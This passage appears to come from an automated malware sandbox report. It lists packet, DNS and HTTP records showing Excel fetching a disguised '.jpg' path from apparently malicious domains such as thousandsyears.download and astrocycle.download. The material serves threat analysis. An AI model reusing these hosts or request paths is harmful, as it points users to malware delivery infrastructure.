                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.951694012 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.951714039 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.951814890 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.952791929 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.952811003 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.952882051 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.953948975 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.953969002 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.954077005 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.954963923 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.954982042 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.955127001 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.956087112 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.956104994 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.956223965 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.957139015 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.957158089 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.957246065 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.958216906 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.958235979 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.958329916 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.959284067 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.959301949 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.959476948 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.960380077 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.036715031 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.036740065 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.036835909 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.037048101 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.037100077 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.037173986 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.038372040 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.038391113 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.038463116 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.039302111 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.039324045 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.039411068 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.040400982 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.040420055 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.040548086 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.041529894 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.041551113 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.041625977 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.042591095 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.042608023 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.042707920 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.043752909 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.043757915 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.043870926 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.044835091 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.044853926 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.044955969 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.045802116 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.045819998 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.045883894 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.046962976 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.046988964 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.047061920 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.048024893 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.048052073 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.048134089 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.049135923 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.049153090 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.049205065 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.050302982 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.125731945 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.125758886 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.125858068 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.126223087 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.126239061 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.126317978 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.127289057 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.127307892 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.127430916 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.128376007 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.128396988 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.128448009 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.129455090 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.129472971 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.129556894 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.130582094 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.130601883 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.130664110 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.131661892 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.131695986 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.131793022 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.132787943 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.132808924 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.132884979 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.133846045 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.133881092 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.133943081 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.134917974 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.134936094 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.135005951 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.136137009 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.136161089 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.136229038 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.137139082 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.137161970 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.137248039 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.138254881 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.138278961 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.138390064 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.139298916 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.215830088 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.215858936 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.215959072 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.216761112 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.216780901 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.216875076 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.217413902 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.217434883 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.217509031 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.218400955 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.218420029 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.218480110 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.219659090 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.219741106 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.219827890 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.220601082 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.220621109 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.220691919 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.221695900 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.221714973 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.221776009 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.222913980 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.222934008 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.222992897 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.223912001 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.223932981 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.223995924 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.224987984 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.225007057 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.225068092 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.226073027 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.226093054 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.226147890 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.227216959 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.227238894 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.227327108 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.228367090 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.228387117 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.228466988 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.229347944 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.304974079 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.305000067 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.305128098 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.305402994 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.305422068 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.305480957 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.306499958 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.306519985 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.306581020 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.307677984 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.307898998 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.307991982 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.308759928 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.308825970 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.308892012 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.511923075 CEST4916980192.168.2.22104.21.37.209
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.549920082 CEST8049169104.21.37.209192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.550023079 CEST4916980192.168.2.22104.21.37.209
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.550395012 CEST4916980192.168.2.22104.21.37.209
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.588284969 CEST8049169104.21.37.209192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:24.097198009 CEST8049169104.21.37.209192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:24.097229004 CEST8049169104.21.37.209192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:24.097400904 CEST4916980192.168.2.22104.21.37.209
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:26.632364035 CEST4916980192.168.2.22104.21.37.209
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:26.632416964 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:05:20.092789888 CEST4916780192.168.2.22172.67.146.88
                                                                                                                                                                                                                                        Jul 6, 2021 16:05:20.093063116 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:05:20.093310118 CEST4916580192.168.2.22172.67.198.51
                                                                                                                                                                                                                                        Jul 6, 2021 16:05:20.131356955 CEST8049167172.67.146.88192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:05:20.131504059 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:05:20.131519079 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:05:20.131527901 CEST4916780192.168.2.22172.67.146.88
                                                                                                                                                                                                                                        Jul 6, 2021 16:05:20.131556988 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:05:20.131568909 CEST4916580192.168.2.22172.67.198.51

                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.143704891 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.203722954 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.353357077 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.427000999 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.600858927 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.670613050 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:21.694626093 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:21.759349108 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:21.784051895 CEST4954853192.168.2.228.8.8.8
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:21.841223955 CEST53495488.8.8.8192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.379229069 CEST5562753192.168.2.228.8.8.8
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.440926075 CEST53556278.8.8.8192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.451970100 CEST5600953192.168.2.228.8.8.8
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.509531975 CEST53560098.8.8.8192.168.2.22

                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.143704891 CEST192.168.2.228.8.8.80xfda2Standard query (0)thousandsyears.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.353357077 CEST192.168.2.228.8.8.80x5115Standard query (0)voopeople.funA (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.600858927 CEST192.168.2.228.8.8.80x78b6Standard query (0)uppercilio.funA (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:21.694626093 CEST192.168.2.228.8.8.80x6fb2Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:21.784051895 CEST192.168.2.228.8.8.80x4495Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.379229069 CEST192.168.2.228.8.8.80xbcacStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.451970100 CEST192.168.2.228.8.8.80x6d9fStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)

                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.203722954 CEST8.8.8.8192.168.2.220xfda2No error (0)thousandsyears.download172.67.198.51A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.203722954 CEST8.8.8.8192.168.2.220xfda2No error (0)thousandsyears.download104.21.52.111A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.427000999 CEST8.8.8.8192.168.2.220x5115No error (0)voopeople.fun172.67.194.117A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.427000999 CEST8.8.8.8192.168.2.220x5115No error (0)voopeople.fun104.21.12.122A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.670613050 CEST8.8.8.8192.168.2.220x78b6No error (0)uppercilio.fun172.67.146.88A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.670613050 CEST8.8.8.8192.168.2.220x78b6No error (0)uppercilio.fun104.21.55.83A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:21.759349108 CEST8.8.8.8192.168.2.220x6fb2No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:21.759349108 CEST8.8.8.8192.168.2.220x6fb2No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:21.759349108 CEST8.8.8.8192.168.2.220x6fb2No error (0)dr49lng3n1n2s.cloudfront.net143.204.91.74A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:21.841223955 CEST8.8.8.8192.168.2.220x4495No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:21.841223955 CEST8.8.8.8192.168.2.220x4495No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:21.841223955 CEST8.8.8.8192.168.2.220x4495No error (0)dr49lng3n1n2s.cloudfront.net143.204.91.74A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.440926075 CEST8.8.8.8192.168.2.220xbcacNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.440926075 CEST8.8.8.8192.168.2.220xbcacNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.509531975 CEST8.8.8.8192.168.2.220x6d9fNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.509531975 CEST8.8.8.8192.168.2.220x6d9fNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)

                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                        • thousandsyears.download
                                                                                                                                                                                                                                        • voopeople.fun
                                                                                                                                                                                                                                        • uppercilio.fun
                                                                                                                                                                                                                                        • astrocycle.download

                                                                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                        0192.168.2.2249165172.67.198.5180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.257003069 CEST0OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        UA-CPU: AMD64
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                                        Host: thousandsyears.download
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.326716900 CEST1INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Tue, 06 Jul 2021 14:03:20 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Cache-Control: max-age=14400
                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                        Age: 409
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=aN2nm8l3J68Dr%2BONnWhtbUxrD00DwDAPSZXrTK7QJvLTStjDQvCXlIjJT97JlRyRE8V32lIboKjKhIiQSk9Kj1MImXsy8Lrcw%2FUioDhd9E5oQzH53IdhpNdCNpz1Wj%2FYR%2B60gjQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 66a9603bcfab4a9e-FRA
                                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                                        Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 14
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.326762915 CEST1INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                        1192.168.2.2249166172.67.194.11780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.471748114 CEST2OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        UA-CPU: AMD64
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
